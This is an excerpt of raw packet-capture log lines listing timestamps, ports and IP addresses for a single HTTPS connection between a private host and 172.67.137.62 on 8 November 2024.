                                                                                                        Nov 8, 2024 11:11:05.671590090 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.672904968 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.673095942 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.673286915 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.673811913 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.674191952 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.674381971 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.674391985 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.674571037 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.674956083 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.675051928 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.675061941 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.675611973 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.675621986 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.675719976 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.676107883 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.676117897 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.676513910 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.676522970 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.676531076 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.676538944 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.676723957 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.676723957 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.676991940 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.677217007 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.677227020 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.678323984 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.678330898 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.678514004 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.678705931 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.679513931 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.679699898 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.679893017 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.680324078 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.681092978 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.681473017 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.681664944 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.681849957 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.682085991 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.682466030 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.682660103 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.682847977 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.683089018 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.683089018 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.683269978 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.683871984 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.683871984 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.684062958 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.684254885 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.684257030 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.684494019 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.684861898 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.685621023 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.685621977 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.685813904 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.685817003 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.686053038 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.686063051 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.686912060 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.686912060 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.687045097 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.687098026 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.687108040 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.687288046 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.687657118 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.687664032 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.688426018 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.688635111 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.688666105 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.689548016 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.689930916 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.689940929 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.690118074 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.690547943 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.691222906 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.691222906 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.691222906 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.691494942 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.691503048 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.692364931 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.692364931 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.692557096 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.692740917 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.692742109 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.693928957 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.694118977 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.694300890 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.694591045 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.695538998 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.695538998 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.695728064 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.695728064 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.882903099 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.884042978 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.884232998 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.884232998 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.884613991 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.884615898 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.885550022 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.885550022 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.886028051 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.886507988 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.886676073 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.887084961 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.887275934 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.887285948 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.887468100 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.887656927 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.887948036 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.888072014 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.888139009 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.888334990 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.888514996 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.888514996 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.888752937 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.889094114 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.889132023 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.890444040 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.890454054 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.890624046 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.891000986 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.892052889 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.892052889 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.892244101 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.892676115 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.893434048 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.893812895 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.893812895 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.894006014 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.894007921 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.894422054 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.894608974 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.894798994 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.894798994 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.895040989 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.895898104 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.896267891 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.896270990 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.896456957 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.896646976 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.896646976 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.896837950 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.897511005 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.897511005 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.897699118 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.898123980 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.898123980 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.898318052 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.899133921 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.899133921 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.899144888 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.899324894 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.900477886 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.900856018 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.900863886 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.901613951 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.901613951 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.901624918 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.901803017 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.901992083 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.902182102 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.902755022 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.902945042 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.903131962 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.903134108 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.904484034 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.904674053 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.904674053 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.904865980 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.905241013 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.906097889 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.906097889 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.906097889 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.906107903 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.906287909 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.907454967 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.907645941 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.908317089 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.908319950 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.909271955 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.909842968 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.910033941 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.910043955 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.910223961 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.910223961 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.910418034 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.911230087 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.911230087 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.911240101 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.911420107 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.911803007 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.911803007 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.911803007 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.911813974 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.912044048 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.912430048 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.912476063 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.912484884 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.912664890 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.912664890 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.912856102 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.913197041 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.913768053 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.913769960 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.914525032 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.914714098 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.914906025 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.915096998 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.915096998 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.915338993 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.915997028 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.916188002 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.916194916 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.916196108 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.916426897 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.916620016 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.916620016 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.917829037 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.917838097 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.918020010 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.918210983 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.918212891 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.919214010 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.919214010 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.919225931 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.919400930 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.919408083 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.920541048 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.920541048 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.920730114 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.920968056 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.920972109 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.922794104 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.922794104 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.922985077 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.922987938 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.924170971 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.924170971 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.924181938 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.924362898 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.924555063 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.924750090 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.924758911 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.924988031 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.924997091 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.925173044 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.925173044 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.925297022 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.925365925 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.925601959 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.925833941 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.925843000 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.926218033 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.926614046 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.926621914 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.926999092 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.927009106 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.927170038 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.927186012 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.927196026 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.927429914 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.927438021 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.927515030 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.928946018 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.929518938 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.930469990 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.930854082 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.930854082 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.931238890 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.931715012 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.931905985 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.932094097 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.932101965 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.932285070 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.932332993 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.932523966 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.933197021 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.933197021 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.933389902 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.933391094 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.933995008 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.935287952 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.935480118 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.935667992 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.935674906 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.935677052 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.935678005 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.936850071 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.936860085 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.937041044 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.937041044 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.937052011 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.937230110 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.938046932 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.938232899 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.938232899 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.938424110 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.939671993 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.939671993 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.939865112 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.939866066 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.939867973 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.941052914 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.941052914 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.941241980 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.941625118 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.941627979 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.942733049 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.942915916 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.943109035 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.943110943 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.944928885 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.945117950 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.945311069 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.945502996 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.946103096 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.946113110 CET44349779172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:11:05.946285009 CET49779443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:11:05.946476936 CET49779443192.168.11.30172.67.137.62
